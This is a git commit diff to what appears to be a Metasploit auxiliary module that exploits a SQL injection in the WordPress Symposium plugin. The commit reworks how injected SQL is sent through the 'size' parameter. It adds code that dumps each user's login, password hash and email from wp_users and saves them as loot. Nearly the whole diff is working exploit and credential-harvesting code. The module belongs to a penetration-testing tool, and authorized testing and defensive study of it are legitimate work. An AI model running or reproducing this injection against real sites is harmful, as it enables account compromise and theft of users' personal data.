modified it as recommended (@brandonprry) and added Module Documentation

bug/bundler_fix
Cantoni Matteo 2016-11-24 10:36:32 +01:00
parent b3b89a57b5
commit fd11e7c4df
1 changed files with 17 additions and 7 deletions

View File

@ -46,12 +46,13 @@ class MetasploitModule < Msf::Auxiliary
end end
def send_sql_request(sql_query) def send_sql_request(sql_query)
uri_complete = normalize_uri(uri_plugin, sql_query) uri_complete = normalize_uri(uri_plugin)
begin begin
res = send_request_cgi( res = send_request_cgi(
'method' => 'GET', 'method' => 'GET',
'uri' => uri_complete, 'uri' => uri_complete,
'vars_get' => { 'size' => sql_query }
) )
return nil if res.nil? || res.code != 200 || res.body.nil? return nil if res.nil? || res.code != 200 || res.body.nil?
@ -66,7 +67,8 @@ class MetasploitModule < Msf::Auxiliary
def run def run
vprint_status("#{peer} - Attempting to connect...") vprint_status("#{peer} - Attempting to connect...")
first_id = send_sql_request("?size=id%20from%20wp_users%20order%20by%20id%20asc%20limit%201%20;%20--") vprint_status("#{peer} - Trying to retrieve the first user id...")
first_id = send_sql_request('id from wp_users order by id asc limit 1 ; --')
if first_id.nil? if first_id.nil?
vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!") vprint_error("#{peer} - Failed to retrieve the first user id... Try with check function!")
return return
@ -75,7 +77,7 @@ class MetasploitModule < Msf::Auxiliary
end end
vprint_status("#{peer} - Trying to retrieve the last user id...") vprint_status("#{peer} - Trying to retrieve the last user id...")
last_id = send_sql_request("?size=id%20from%20wp_users%20order%20by%20id%20desc%20limit%201%20;%20--") last_id = send_sql_request('id from wp_users order by id desc limit 1 ; --')
if last_id.nil? if last_id.nil?
vprint_error("#{peer} - Failed to retrieve the last user id") vprint_error("#{peer} - Failed to retrieve the last user id")
return return
@ -86,14 +88,22 @@ class MetasploitModule < Msf::Auxiliary
vprint_status("#{peer} - Trying to retrieve the users informations...") vprint_status("#{peer} - Trying to retrieve the users informations...")
for user_id in first_id..last_id for user_id in first_id..last_id
separator = Rex::Text.rand_text_numeric(7,bad='0') separator = Rex::Text.rand_text_numeric(7,bad='0')
user_info = send_sql_request("?size=concat_ws(#{separator},user_login,user_pass,user_email)%20from%20wp_users%20where%20id%20=%20#{user_id}%20;%20--") user_info = send_sql_request("concat_ws(#{separator},user_login,user_pass,user_email) from wp_users where id = #{user_id} ; --")
if user_info.nil? if user_info.nil?
vprint_error("#{peer} - Failed to retrieve the users info") vprint_error("#{peer} - Failed to retrieve the users info")
return return
else else
values = user_info.split("#{separator}") values = user_info.split("#{separator}")
print_good("#{peer} - #{sprintf("%-15s %-34s %s", values[0], values[1], values[2])}")
user_login = values[0]
user_pass = values[1]
user_email = values[2]
print_good("#{peer} - #{sprintf("%-15s %-34s %s", user_login, user_pass, user_email)}")
loot = store_loot("wp_symposium.http","text/plain", rhost, "#{user_login},#{user_pass},#{user_email}")
vprint_status("Credentials saved in: #{loot}")
end end
end end
end end